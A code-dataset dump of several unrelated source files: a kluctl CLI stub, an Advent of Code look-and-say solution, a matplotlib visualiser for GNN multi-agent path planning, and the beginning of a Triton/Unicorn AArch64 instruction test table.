"to the current working directory.",
default='.', type=click.Path(exists=True, file_okay=False))
@optgroup.option("--force-reseal",
help="Lets kluctl ignore secret hashes found in already sealed secrets and thus forces "
"resealing of those.",
is_flag=True)
@click.pass_obj
def seal_command_stub(obj, **kwargs):
from kluctl.seal.seal_command import seal_command
seal_command(obj, kwargs)
| true | true |
1c4a8c258378ad8f2a962e64c0b2b5d11bc73837 | 375 | py | Python | 2015/10/part2.py | timofurrer/aoc-2020 | 446b688a57601d9891f520e43b7f822c373a6ff4 | [
"MIT"
] | null | null | null | 2015/10/part2.py | timofurrer/aoc-2020 | 446b688a57601d9891f520e43b7f822c373a6ff4 | [
"MIT"
] | null | null | null | 2015/10/part2.py | timofurrer/aoc-2020 | 446b688a57601d9891f520e43b7f822c373a6ff4 | [
"MIT"
] | null | null | null | from pathlib import Path
with (Path(__file__).parent / "input.txt").open() as puzzle_input_file:
puzzle_input_raw = puzzle_input_file.read()
import itertools
number = puzzle_input_raw
def look_and_say(look):
return ''.join(str(len([1 for _ in v])) + k for k, v in itertools.groupby(look))
for _ in range(50):
number = look_and_say(number)
print(len(number)) | 23.4375 | 84 | 0.72 | from pathlib import Path
with (Path(__file__).parent / "input.txt").open() as puzzle_input_file:
puzzle_input_raw = puzzle_input_file.read()
import itertools
number = puzzle_input_raw
def look_and_say(look):
return ''.join(str(len([1 for _ in v])) + k for k, v in itertools.groupby(look))
for _ in range(50):
number = look_and_say(number)
print(len(number)) | true | true |
1c4a8d43ec29814bf33a1a684899d96c24b15fbe | 13,571 | py | Python | utils/visualize.py | vtekur/gnn_pathplanning | 150ca315c214134eda8f5c5b55ce71da9360bcce | [
"MIT"
] | null | null | null | utils/visualize.py | vtekur/gnn_pathplanning | 150ca315c214134eda8f5c5b55ce71da9360bcce | [
"MIT"
] | null | null | null | utils/visualize.py | vtekur/gnn_pathplanning | 150ca315c214134eda8f5c5b55ce71da9360bcce | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import yaml
import matplotlib
# matplotlib.use("Agg")
from matplotlib.patches import Circle, Rectangle, Arrow
from matplotlib.collections import PatchCollection
from matplotlib.patches import ConnectionPatch
from matplotlib.patches import FancyArrowPatch
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation
from matplotlib import lines
import matplotlib.animation as manimation
import argparse
import math
import gc
import seaborn as sns
import time
import scipy.io as sio
import sys
np.set_printoptions(threshold=np.inf)
class Animation:
def __init__(self, config):
self.config = config
with open(config.map) as map_file:
self.data_map = yaml.load(map_file)
with open(config.schedule) as states_file:
self.schedule = yaml.load(states_file)
self.num_agents = len(self.data_map["agents"])
self.K = self.config.nGraphFilterTaps
self.ID_agent = self.config.id_chosenAgent
data_contents = sio.loadmat(config.GSO)
self.GSO = np.transpose(data_contents["gso"], (2, 3, 0, 1)).squeeze(3)
self.commRadius = data_contents["commRadius"]
self.maxLink = 500
aspect = self.data_map["map"]["dimensions"][0] / self.data_map["map"]["dimensions"][1]
self.fig = plt.figure(frameon=False, figsize=(4 * aspect, 4))
self.ax = self.fig.add_subplot(111, aspect='equal')
self.fig.subplots_adjust(left=0, right=1, bottom=0, top=1, wspace=None, hspace=None)
# self.ax.set_frame_on(False)
self.patches = []
self.artists = []
self.agents = dict()
self.commLink = dict()
self.agent_names = dict()
# self.list_color = self.get_cmap(self.num_agents)
self.list_color = sns.color_palette("hls", self.num_agents)
self.list_color_commLink = sns.color_palette("hls", 8) # self.K)
self.list_commLinkStyle = list(lines.lineStyles.keys())
# create boundary patch
xmin = -0.5
ymin = -0.5
xmax = self.data_map["map"]["dimensions"][0] - 0.5
ymax = self.data_map["map"]["dimensions"][1] - 0.5
# self.ax.relim()
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
# self.ax.set_xticks([])
# self.ax.set_yticks([])
# plt.axis('off')
# self.ax.axis('tight')
# self.ax.axis('off')
self.patches.append(Rectangle((xmin, ymin), xmax - xmin, ymax - ymin, facecolor='none', edgecolor='black'))
for o in self.data_map["map"]["obstacles"]:
x, y = o[0], o[1]
self.patches.append(Rectangle((x - 0.5, y - 0.5), 1, 1, facecolor='black', edgecolor='black'))
# initialize communication Link
for id_link in range(self.maxLink):
#https://matplotlib.org/api/artist_api.html#module-matplotlib.lines
name_link = "{}".format(id_link)
# self.commLink[name_link] = FancyArrowPatch((0,0), (0,0),linewidth=2)
self.commLink[name_link] = plt.Line2D((0, 0), (0, 0), linewidth=2)
self.artists.append(self.commLink[name_link])
# print(self.schedule["schedule"])
# create agents:
self.T = 0
# draw goals first
for d, i in zip(self.data_map["agents"], range(0, self.num_agents)):
self.patches.append(
Rectangle((d["goal"][0] - 0.25, d["goal"][1] - 0.25), 0.6, 0.6, facecolor=self.list_color[i],
edgecolor=self.list_color[i], alpha=0.5))
for d, i in zip(self.data_map["agents"], range(0, self.num_agents)):
#https://matplotlib.org/api/artist_api.html#module-matplotlib.lines
name = d["name"]
self.agents[name] = Circle((d["start"][0], d["start"][1]), 0.4, facecolor=self.list_color[i],
edgecolor=self.list_color[i])
self.agents[name].original_face_color = self.list_color[i]
self.patches.append(self.agents[name])
self.T = max(self.T, self.schedule["schedule"][name][-1]["t"])
# set floating ID
self.agent_names[name] = self.ax.text(d["start"][0], d["start"][1], name.replace('agent', ''))
self.agent_names[name].set_horizontalalignment('center')
self.agent_names[name].set_verticalalignment('center')
self.artists.append(self.agent_names[name])
# self.ax.add_line(dotted_line)
# self.ax.set_axis_off()
# self.fig.axes[0].set_visible(False)
# self.fig.axes.get_yaxis().set_visible(False)
# self.fig.tight_layout()
self.anim = animation.FuncAnimation(self.fig, self.animate_func,
init_func=self.init_func,
frames=int(self.T + 1) * 10,
interval=100,
blit=True)
def get_cmap(self, n, name='hsv'):
'''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct
RGB color; the keyword argument name must be a standard mpl colormap name.'''
return plt.cm.get_cmap(name, n)
def save(self, file_name, speed):
self.anim.save(
file_name,
"ffmpeg",
fps=10 * speed,
dpi=200),8
# savefig_kwargs={"pad_inches": 0, "bbox_inches": "tight"})
def show(self):
plt.show()
def init_func(self):
for p in self.patches:
self.ax.add_patch(p)
for a in self.artists:
self.ax.add_artist(a)
return self.patches + self.artists
# def find_neighours(self, ID_selected_agent, step, level, max_level=self.K):
def get_currentGSO(self, step):
# module to get GSO
# print(self.GSO.shape)
GSO_current = self.GSO[:, :, step]
# print(GSO_current.shape)
gso_up_diag = np.triu(GSO_current)
# print(gso_up)
# return gso_up_diag
return GSO_current
def update_gso(self, gso_tmp, id_chosenAgent, id_neighborAgent):
gso_tmp[id_chosenAgent, id_neighborAgent] = 0
gso_tmp[id_neighborAgent, id_chosenAgent] = 0
return gso_tmp
def find_neighours(self, gso, id_chosenAgent):
# print(id_chosenAgent)
# print(gso)
ID_neighbor_robot = gso[id_chosenAgent,:].nonzero()[0]
# print(gso_up[ID_selected_agent,:])
# print(ID_neighbor_robot)
return ID_neighbor_robot, ID_neighbor_robot.shape[0]
def build_comm_link(self, store_list_line, gso, id_chosenAgent, index_hop):
if index_hop >= self.K:
# print('\n {}\n'.format(store_list_line))
return store_list_line
else:
# status_agent_currentHop = agents_array[id_chosenAgent]
id_neighbor_robot, num_neighbor = self.find_neighours(gso, id_chosenAgent)
# pos_agent_currentHop_array = np.array(status_agent_currentHop.center)
# repeat until K
for index in range(num_neighbor):
id_neighbor = id_neighbor_robot[index]
# status_agent_nextHop = agents_array[id_neighbor]
# pos_agent_nextHop_array = np.array(status_agent_nextHop.center)
# draw line (pos1,pos2)
# print('#### current hop {} / {}'.format(index_hop+1,self.K))
# print('\t {} <- \t{}'.format(id_chosenAgent, id_neighbor))
# print('\t {} <- \t{}'.format(status_agent_currentHop, status_agent_nextHop))
# posX_agent = (pos_agent_currentHop_array[0], pos_agent_nextHop_array[0])
# posY_agent = (pos_agent_currentHop_array[1], pos_agent_nextHop_array[1])
line = (index_hop + 1,index_hop-1, (id_chosenAgent, id_neighbor))
name_line = '{}-{}'.format(id_chosenAgent, id_neighbor)
store_list_line.update({name_line:line})
gso_new = self.update_gso(gso,id_chosenAgent,id_neighbor)
store_list_line = self.build_comm_link(store_list_line, gso_new, id_neighbor, index_hop+1)
return store_list_line
def get_linkPos(self,agents_array,id_chosenAgent,id_neighbor):
status_agent_currentHop = agents_array[id_chosenAgent]
pos_agent_currentHop_array = np.array(status_agent_currentHop.center)
status_agent_nextHop = agents_array[id_neighbor]
pos_agent_nextHop_array = np.array(status_agent_nextHop.center)
posX_agent = (pos_agent_currentHop_array[0], pos_agent_nextHop_array[0])
posY_agent = (pos_agent_currentHop_array[1], pos_agent_nextHop_array[1])
return (posX_agent, posY_agent)
def animate_func(self, i):
currentStep = i//10
if i%10 == 0:
gso_current = self.get_currentGSO(currentStep)
self.list_line = self.build_comm_link({}, gso_current, self.ID_agent, 1)
# print(self.list_line)
# print("time-frame:{}/{} - step:{}".format(i,int(self.T + 1) * 10, currentStep))
for agent_name in self.schedule["schedule"]:
agent = self.schedule["schedule"][agent_name]
# print(agent)
pos = self.getState(i / 10, agent)
p = (pos[0], pos[1])
self.agents[agent_name].center = p
self.agent_names[agent_name].set_position(p)
# reset all colors
for _, agent in self.agents.items():
agent.set_facecolor(agent.original_face_color)
# build communcation link
agents_array = [agent for _, agent in self.agents.items()]
id_link = 0
for key_link, line_info in self.list_line.items():
name_link = "{}".format(id_link)
index_hop, index_style, (id_chosenAgent, id_neighbor) = line_info
pos = self.get_linkPos(agents_array, id_chosenAgent, id_neighbor)
self.commLink[name_link].set_data(pos)
self.commLink[name_link].set_color(self.list_color_commLink[index_style])
self.commLink[name_link].set_linestyle(self.list_commLinkStyle[index_style])
# print(self.list_commLinkStyle[index_hop-2])
# print("{}/{}- {} - {}".format(index_hop, self.K, key_link, self.commLink[name_link]._posA_posB))
id_link += 1
id_link_reset = id_link
for id_link_rest in range(id_link_reset, self.maxLink):
name_link = "{}".format(id_link_rest)
self.commLink[name_link].set_data((0, 0), (0, 0))
# check drive-drive collisions
for id_m in range(0, len(agents_array)):
for id_n in range(id_m + 1, len(agents_array)):
# print(i,j)
d1 = agents_array[id_m]
d2 = agents_array[id_n]
pos1 = np.array(d1.center)
pos2 = np.array(d2.center)
# plt.plot(pos1, pos2, 'ro-')
if np.linalg.norm(pos1 - pos2) < 0.7:
d1.set_facecolor('red')
d2.set_facecolor('red')
print("COLLISION! (agent-agent) ({}, {})".format(id_m, id_n))
return self.patches + self.artists
def getState(self, t, d):
idx = 0
while idx < len(d) and d[idx]["t"] < t:
idx += 1
if idx == 0:
return np.array([float(d[0]["x"]), float(d[0]["y"])])
elif idx < len(d):
posLast = np.array([float(d[idx - 1]["x"]), float(d[idx - 1]["y"])])
posNext = np.array([float(d[idx]["x"]), float(d[idx]["y"])])
else:
return np.array([float(d[-1]["x"]), float(d[-1]["y"])])
dt = d[idx]["t"] - d[idx - 1]["t"]
t = (t - d[idx - 1]["t"]) / dt
pos = (posNext - posLast) * t + posLast
# print(pos)
return pos
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--local_dir', default='/Users/vtek/gnn_pathplanning/')
parser.add_argument('--nGraphFilterTaps', type=int, default=3)
parser.add_argument('--type')
parser.add_argument('--caseId', default='00000')
parser.add_argument("--speed", type=int, default=2, help="speedup-factor")
parser.add_argument('--log_time_trained', type=str, default='0')
parser.add_argument('--id_chosenAgent', type=int, default=0)
parser.add_argument('--failure_case', type=bool, default=False)
parser.add_argument('--name', default=None)
args = parser.parse_args()
if args.failure_case:
case_type = 'failure'
else:
case_type = 'success'
base_dir = args.local_dir + 'Results_best/AnimeDemo/{}/map20x20_rho1_10Agent/K{}_HS0/TR_M20p1_10Agent/{}/commR_6/'.format(args.type, args.nGraphFilterTaps,args.log_time_trained)
args.map = base_dir + 'input/{}Cases_ID{}.yaml'.format(case_type, args.caseId)
args.schedule = base_dir+'predict_{}/{}Cases_ID{}.yaml'.format(case_type,case_type,args.caseId)
args.GSO = base_dir+'GSO/{}Cases_ID{}.mat'.format(case_type,args.caseId)
if args.name:
args.video = args.local_dir + 'Results_best/' + '/video_K{}_{}_{}.mp4'.format(args.nGraphFilterTaps, args.type, args.name)
else:
args.video = args.local_dir + 'Results_best/' + '/video_K{}_{}.mp4'.format(args.nGraphFilterTaps, args.type)
animation = Animation(args)
if args.video:
print("Starting!")
animation.save(args.video, args.speed)
print("Ending!")
else:
animation.show()
| 40.150888 | 181 | 0.603419 | import yaml
import matplotlib
from matplotlib.patches import Circle, Rectangle, Arrow
from matplotlib.collections import PatchCollection
from matplotlib.patches import ConnectionPatch
from matplotlib.patches import FancyArrowPatch
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import animation
from matplotlib import lines
import matplotlib.animation as manimation
import argparse
import math
import gc
import seaborn as sns
import time
import scipy.io as sio
import sys
np.set_printoptions(threshold=np.inf)
class Animation:
def __init__(self, config):
self.config = config
with open(config.map) as map_file:
self.data_map = yaml.load(map_file)
with open(config.schedule) as states_file:
self.schedule = yaml.load(states_file)
self.num_agents = len(self.data_map["agents"])
self.K = self.config.nGraphFilterTaps
self.ID_agent = self.config.id_chosenAgent
data_contents = sio.loadmat(config.GSO)
self.GSO = np.transpose(data_contents["gso"], (2, 3, 0, 1)).squeeze(3)
self.commRadius = data_contents["commRadius"]
self.maxLink = 500
aspect = self.data_map["map"]["dimensions"][0] / self.data_map["map"]["dimensions"][1]
self.fig = plt.figure(frameon=False, figsize=(4 * aspect, 4))
self.ax = self.fig.add_subplot(111, aspect='equal')
self.fig.subplots_adjust(left=0, right=1, bottom=0, top=1, wspace=None, hspace=None)
self.patches = []
self.artists = []
self.agents = dict()
self.commLink = dict()
self.agent_names = dict()
self.list_color = sns.color_palette("hls", self.num_agents)
self.list_color_commLink = sns.color_palette("hls", 8)
self.list_commLinkStyle = list(lines.lineStyles.keys())
xmin = -0.5
ymin = -0.5
xmax = self.data_map["map"]["dimensions"][0] - 0.5
ymax = self.data_map["map"]["dimensions"][1] - 0.5
plt.xlim(xmin, xmax)
plt.ylim(ymin, ymax)
self.patches.append(Rectangle((xmin, ymin), xmax - xmin, ymax - ymin, facecolor='none', edgecolor='black'))
for o in self.data_map["map"]["obstacles"]:
x, y = o[0], o[1]
self.patches.append(Rectangle((x - 0.5, y - 0.5), 1, 1, facecolor='black', edgecolor='black'))
for id_link in range(self.maxLink):
name_link = "{}".format(id_link)
self.commLink[name_link] = plt.Line2D((0, 0), (0, 0), linewidth=2)
self.artists.append(self.commLink[name_link])
self.T = 0
for d, i in zip(self.data_map["agents"], range(0, self.num_agents)):
self.patches.append(
Rectangle((d["goal"][0] - 0.25, d["goal"][1] - 0.25), 0.6, 0.6, facecolor=self.list_color[i],
edgecolor=self.list_color[i], alpha=0.5))
for d, i in zip(self.data_map["agents"], range(0, self.num_agents)):
name = d["name"]
self.agents[name] = Circle((d["start"][0], d["start"][1]), 0.4, facecolor=self.list_color[i],
edgecolor=self.list_color[i])
self.agents[name].original_face_color = self.list_color[i]
self.patches.append(self.agents[name])
self.T = max(self.T, self.schedule["schedule"][name][-1]["t"])
self.agent_names[name] = self.ax.text(d["start"][0], d["start"][1], name.replace('agent', ''))
self.agent_names[name].set_horizontalalignment('center')
self.agent_names[name].set_verticalalignment('center')
self.artists.append(self.agent_names[name])
self.anim = animation.FuncAnimation(self.fig, self.animate_func,
init_func=self.init_func,
frames=int(self.T + 1) * 10,
interval=100,
blit=True)
def get_cmap(self, n, name='hsv'):
return plt.cm.get_cmap(name, n)
def save(self, file_name, speed):
self.anim.save(
file_name,
"ffmpeg",
fps=10 * speed,
dpi=200),8
def show(self):
plt.show()
def init_func(self):
for p in self.patches:
self.ax.add_patch(p)
for a in self.artists:
self.ax.add_artist(a)
return self.patches + self.artists
def get_currentGSO(self, step):
GSO_current = self.GSO[:, :, step]
gso_up_diag = np.triu(GSO_current)
return GSO_current
def update_gso(self, gso_tmp, id_chosenAgent, id_neighborAgent):
gso_tmp[id_chosenAgent, id_neighborAgent] = 0
gso_tmp[id_neighborAgent, id_chosenAgent] = 0
return gso_tmp
def find_neighours(self, gso, id_chosenAgent):
ID_neighbor_robot = gso[id_chosenAgent,:].nonzero()[0]
return ID_neighbor_robot, ID_neighbor_robot.shape[0]
def build_comm_link(self, store_list_line, gso, id_chosenAgent, index_hop):
if index_hop >= self.K:
return store_list_line
else:
id_neighbor_robot, num_neighbor = self.find_neighours(gso, id_chosenAgent)
for index in range(num_neighbor):
id_neighbor = id_neighbor_robot[index]
line = (index_hop + 1,index_hop-1, (id_chosenAgent, id_neighbor))
name_line = '{}-{}'.format(id_chosenAgent, id_neighbor)
store_list_line.update({name_line:line})
gso_new = self.update_gso(gso,id_chosenAgent,id_neighbor)
store_list_line = self.build_comm_link(store_list_line, gso_new, id_neighbor, index_hop+1)
return store_list_line
def get_linkPos(self,agents_array,id_chosenAgent,id_neighbor):
status_agent_currentHop = agents_array[id_chosenAgent]
pos_agent_currentHop_array = np.array(status_agent_currentHop.center)
status_agent_nextHop = agents_array[id_neighbor]
pos_agent_nextHop_array = np.array(status_agent_nextHop.center)
posX_agent = (pos_agent_currentHop_array[0], pos_agent_nextHop_array[0])
posY_agent = (pos_agent_currentHop_array[1], pos_agent_nextHop_array[1])
return (posX_agent, posY_agent)
def animate_func(self, i):
currentStep = i//10
if i%10 == 0:
gso_current = self.get_currentGSO(currentStep)
self.list_line = self.build_comm_link({}, gso_current, self.ID_agent, 1)
for agent_name in self.schedule["schedule"]:
agent = self.schedule["schedule"][agent_name]
pos = self.getState(i / 10, agent)
p = (pos[0], pos[1])
self.agents[agent_name].center = p
self.agent_names[agent_name].set_position(p)
for _, agent in self.agents.items():
agent.set_facecolor(agent.original_face_color)
agents_array = [agent for _, agent in self.agents.items()]
id_link = 0
for key_link, line_info in self.list_line.items():
name_link = "{}".format(id_link)
index_hop, index_style, (id_chosenAgent, id_neighbor) = line_info
pos = self.get_linkPos(agents_array, id_chosenAgent, id_neighbor)
self.commLink[name_link].set_data(pos)
self.commLink[name_link].set_color(self.list_color_commLink[index_style])
self.commLink[name_link].set_linestyle(self.list_commLinkStyle[index_style])
id_link += 1
id_link_reset = id_link
for id_link_rest in range(id_link_reset, self.maxLink):
name_link = "{}".format(id_link_rest)
self.commLink[name_link].set_data((0, 0), (0, 0))
for id_m in range(0, len(agents_array)):
for id_n in range(id_m + 1, len(agents_array)):
d1 = agents_array[id_m]
d2 = agents_array[id_n]
pos1 = np.array(d1.center)
pos2 = np.array(d2.center)
if np.linalg.norm(pos1 - pos2) < 0.7:
d1.set_facecolor('red')
d2.set_facecolor('red')
print("COLLISION! (agent-agent) ({}, {})".format(id_m, id_n))
return self.patches + self.artists
def getState(self, t, d):
idx = 0
while idx < len(d) and d[idx]["t"] < t:
idx += 1
if idx == 0:
return np.array([float(d[0]["x"]), float(d[0]["y"])])
elif idx < len(d):
posLast = np.array([float(d[idx - 1]["x"]), float(d[idx - 1]["y"])])
posNext = np.array([float(d[idx]["x"]), float(d[idx]["y"])])
else:
return np.array([float(d[-1]["x"]), float(d[-1]["y"])])
dt = d[idx]["t"] - d[idx - 1]["t"]
t = (t - d[idx - 1]["t"]) / dt
pos = (posNext - posLast) * t + posLast
return pos
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--local_dir', default='/Users/vtek/gnn_pathplanning/')
parser.add_argument('--nGraphFilterTaps', type=int, default=3)
parser.add_argument('--type')
parser.add_argument('--caseId', default='00000')
parser.add_argument("--speed", type=int, default=2, help="speedup-factor")
parser.add_argument('--log_time_trained', type=str, default='0')
parser.add_argument('--id_chosenAgent', type=int, default=0)
parser.add_argument('--failure_case', type=bool, default=False)
parser.add_argument('--name', default=None)
args = parser.parse_args()
if args.failure_case:
case_type = 'failure'
else:
case_type = 'success'
base_dir = args.local_dir + 'Results_best/AnimeDemo/{}/map20x20_rho1_10Agent/K{}_HS0/TR_M20p1_10Agent/{}/commR_6/'.format(args.type, args.nGraphFilterTaps,args.log_time_trained)
args.map = base_dir + 'input/{}Cases_ID{}.yaml'.format(case_type, args.caseId)
args.schedule = base_dir+'predict_{}/{}Cases_ID{}.yaml'.format(case_type,case_type,args.caseId)
args.GSO = base_dir+'GSO/{}Cases_ID{}.mat'.format(case_type,args.caseId)
if args.name:
args.video = args.local_dir + 'Results_best/' + '/video_K{}_{}_{}.mp4'.format(args.nGraphFilterTaps, args.type, args.name)
else:
args.video = args.local_dir + 'Results_best/' + '/video_K{}_{}.mp4'.format(args.nGraphFilterTaps, args.type)
animation = Animation(args)
if args.video:
print("Starting!")
animation.save(args.video, args.speed)
print("Ending!")
else:
animation.show()
| true | true |
1c4a8d92aa7936b2472071f2adda42a56ce328db | 88,007 | py | Python | src/testers/unicorn_test_aarch64.py | TehRick/Triton | 397e42edb2fb7c3fea12be22f70c44e8d0859d57 | [
"Apache-2.0"
] | null | null | null | src/testers/unicorn_test_aarch64.py | TehRick/Triton | 397e42edb2fb7c3fea12be22f70c44e8d0859d57 | [
"Apache-2.0"
] | null | null | null | src/testers/unicorn_test_aarch64.py | TehRick/Triton | 397e42edb2fb7c3fea12be22f70c44e8d0859d57 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
import pprint
from triton import *
from unicorn import *
from unicorn.arm64_const import *
ADDR = 0x100000
STACK = 0x200000
HEAP = 0x300000
SIZE = 5 * 1024 * 1024
CODE = [
("\x80\x46\x82\xd2", "movz x0, #0x1234"),
("\x80\x46\xa2\xd2", "movz x0, #0x1234, lsl #16"),
("\x80\x46\xc2\xd2", "movz x0, #0x1234, lsl #32"),
("\x80\x46\xe2\xd2", "movz x0, #0x1234, lsl #48"),
("\x21\x64\x88\xd2", "movz x1, #0x4321"),
("\x21\x64\xa8\xd2", "movz x1, #0x4321, lsl #16"),
("\x21\x64\xc8\xd2", "movz x1, #0x4321, lsl #32"),
("\x21\x64\xe8\xd2", "movz x1, #0x4321, lsl #48"),
("\x21\x64\xe8\xd2", "movz x1, #0x4321, lsl #48"),
("\x21\x64\xc8\xd2", "movz x1, #0x4321, lsl #32"),
("\x21\x64\xa8\xd2", "movz x1, #0x4321, lsl #16"),
("\x21\x64\x88\xf2", "movk x1, #0x4321"),
("\x81\x46\xa2\xf2", "movk x1, #0x1234, lsl #16"),
("\x81\x04\xcf\xf2", "movk x1, #0x7824, lsl #32"),
("\x61\x8a\xf2\xf2", "movk x1, #0x9453, lsl #48"),
("\xe0\xcc\x8c\x52", "movz w0, #0x6667"),
("\xc0\xcc\xac\x72", "movk w0, #0x6666, lsl #16"),
("\x1f\x20\x03\xd5", "nop"),
("\x1f\x20\x03\xd5", "nop"),
("\x1f\x20\x03\xd5", "nop"),
("\x60\x00\x02\x8b", "add x0, x3, x2"),
("\x20\x00\x02\x8b", "add x0, x1, x2"),
("\x80\x46\xa2\xd2", "movz x0, #0x1234, lsl #16"),
("\x00\x00\x00\x8b", "add x0, x0, x0"),
("\x60\xc0\x22\x8b", "add x0, x3, w2, sxtw"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\x8b", "add x0, x1, w2, sxtb"),
("\x20\xa0\x22\x8b", "add x0, x1, w2, sxth"),
("\x20\xc0\x22\x8b", "add x0, x1, w2, sxtw"),
("\x20\xe0\x22\x8b", "add x0, x1, x2, sxtx"),
("\x20\x00\x02\x8b", "add x0, x1, x2, lsl #0"),
("\x20\x04\x02\x8b", "add x0, x1, x2, lsl #1"),
("\x20\x20\x02\x8b", "add x0, x1, x2, lsl #8"),
("\x20\x40\x02\x8b", "add x0, x1, x2, lsl #16"),
("\x20\x80\x02\x8b", "add x0, x1, x2, lsl #32"),
("\x20\x84\x02\x8b", "add x0, x1, x2, lsl #33"),
("\x20\x88\x02\x8b", "add x0, x1, x2, lsl #34"),
("\x20\x00\x42\x8b", "add x0, x1, x2, lsr #0"),
("\x20\x04\x42\x8b", "add x0, x1, x2, lsr #1"),
("\x20\x20\x42\x8b", "add x0, x1, x2, lsr #8"),
("\x20\x40\x42\x8b", "add x0, x1, x2, lsr #16"),
("\x20\x80\x42\x8b", "add x0, x1, x2, lsr #32"),
("\x20\x84\x42\x8b", "add x0, x1, x2, lsr #33"),
("\x20\x88\x42\x8b", "add x0, x1, x2, lsr #34"),
("\x20\x20\x82\x8b", "add x0, x1, x2, asr #8"),
("\x20\x40\x82\x8b", "add x0, x1, x2, asr #16"),
("\x20\x80\x82\x8b", "add x0, x1, x2, asr #32"),
("\x20\x84\x82\x8b", "add x0, x1, x2, asr #33"),
("\x20\x88\x82\x8b", "add x0, x1, x2, asr #34"),
("\x20\x88\x82\x8b", "add x0, x1, x2, asr #34"),
("\x20\x88\x19\x91", "add x0, x1, #1634"),
("\x20\x58\x21\x91", "add x0, x1, #2134"),
("\x20\x58\x61\x91", "add x0, x1, #2134, lsl #12"),
("\x3f\x60\x22\x8b", "add sp, x1, x2"),
("\x60\x00\x02\xab", "adds x0, x3, x2"),
("\x20\x00\x02\xab", "adds x0, x1, x2"),
("\x80\x46\xa2\xd2", "movz x0, #0x1234, lsl #16"),
("\x00\x00\x00\xab", "adds x0, x0, x0"),
("\x60\xc0\x22\xab", "adds x0, x3, w2, sxtw"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\xab", "adds x0, x1, w2, sxtb"),
("\x20\xa0\x22\xab", "adds x0, x1, w2, sxth"),
("\x20\xc0\x22\xab", "adds x0, x1, w2, sxtw"),
("\x20\xe0\x22\xab", "adds x0, x1, x2, sxtx"),
("\x20\x00\x02\xab", "adds x0, x1, x2, lsl #0"),
("\x20\x04\x02\xab", "adds x0, x1, x2, lsl #1"),
("\x20\x20\x02\xab", "adds x0, x1, x2, lsl #8"),
("\x20\x40\x02\xab", "adds x0, x1, x2, lsl #16"),
("\x20\x80\x02\xab", "adds x0, x1, x2, lsl #32"),
("\x20\x84\x02\xab", "adds x0, x1, x2, lsl #33"),
("\x20\x88\x02\xab", "adds x0, x1, x2, lsl #34"),
("\x20\x00\x42\xab", "adds x0, x1, x2, lsr #0"),
("\x20\x04\x42\xab", "adds x0, x1, x2, lsr #1"),
("\x20\x20\x42\xab", "adds x0, x1, x2, lsr #8"),
("\x20\x40\x42\xab", "adds x0, x1, x2, lsr #16"),
("\x20\x80\x42\xab", "adds x0, x1, x2, lsr #32"),
("\x20\x84\x42\xab", "adds x0, x1, x2, lsr #33"),
("\x20\x88\x42\xab", "adds x0, x1, x2, lsr #34"),
("\x20\x20\x82\xab", "adds x0, x1, x2, asr #8"),
("\x20\x40\x82\xab", "adds x0, x1, x2, asr #16"),
("\x20\x80\x82\xab", "adds x0, x1, x2, asr #32"),
("\x20\x84\x82\xab", "adds x0, x1, x2, asr #33"),
("\x20\x88\x82\xab", "adds x0, x1, x2, asr #34"),
("\x20\x88\x82\xab", "adds x0, x1, x2, asr #34"),
("\x20\x88\x19\xb1", "adds x0, x1, #1634"),
("\x20\x58\x21\xb1", "adds x0, x1, #2134"),
("\x20\x58\x61\xb1", "adds x0, x1, #2134, lsl #12"),
("\x00\x00\x00\xab", "adds x0, x0, x0"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x00\x04\x00\xb1", "adds x0, x0, #1"),
("\x20\x00\x02\x9a", "adc x0, x1, x2"),
("\x20\x00\x02\x1a", "adc w0, w1, w2"),
("\x20\x1a\x09\x30", "adr x0, #0x12345"),
("\xe1\xff\x7f\x70", "adr x1, #0xfffff"),
("\xc1\x7c\x00\xd0", "adrp x1, #0xf9a000"),
("\x41\x0c\x00\xf0", "adrp x1, #0x18b000"),
("\xe1\xff\x9f\xd2", "movz x1, #0xffff"),
("\x22\x00\x80\xd2", "movz x2, #0x1"),
("\x20\x1c\x40\x92", "and x0, x1, #0xff"),
("\x20\x00\x40\x92", "and x0, x1, #0x01"),
("\x20\x00\x7c\x92", "and x0, x1, #0x10"),
("\x20\x00\x02\x8a", "and x0, x1, x2"),
("\x20\x04\x02\x8a", "and x0, x1, x2, lsl #1"),
("\x20\x08\x02\x8a", "and x0, x1, x2, lsl #2"),
("\x20\x0c\x02\x8a", "and x0, x1, x2, lsl #3"),
("\x20\x10\x02\x8a", "and x0, x1, x2, lsl #4"),
("\x20\x1c\x40\xf2", "ands x0, x1, #0xff"),
("\x20\x00\x40\xf2", "ands x0, x1, #0x01"),
("\x20\x00\x7c\xf2", "ands x0, x1, #0x10"),
("\x20\x00\x02\xea", "ands x0, x1, x2"),
("\x20\x04\x02\xea", "ands x0, x1, x2, lsl #1"),
("\x20\x08\x02\xea", "ands x0, x1, x2, lsl #2"),
("\x20\x0c\x02\xea", "ands x0, x1, x2, lsl #3"),
("\x20\x10\x02\xea", "ands x0, x1, x2, lsl #4"),
("\x3f\x1c\x40\xf2", "tst x1, #0xff"),
("\x3f\x00\x40\xf2", "tst x1, #0x01"),
("\x3f\x00\x7c\xf2", "tst x1, #0x10"),
("\x3f\x00\x02\xea", "tst x1, x2"),
("\x3f\x04\x02\xea", "tst x1, x2, lsl #1"),
("\x3f\x08\x02\xea", "tst x1, x2, lsl #2"),
("\x3f\x0c\x02\xea", "tst x1, x2, lsl #3"),
("\x3f\x10\x02\xea", "tst x1, x2, lsl #4"),
("\x20\xfc\x41\x93", "asr x0, x1, #1"),
("\x20\xfc\x42\x93", "asr x0, x1, #2"),
("\x20\xfc\x43\x93", "asr x0, x1, #3"),
("\x20\xfc\x44\x93", "asr x0, x1, #4"),
("\x20\xfc\x44\x93", "asr x0, x1, #4"),
("\x20\xfc\x7f\x93", "asr x0, x1, #63"),
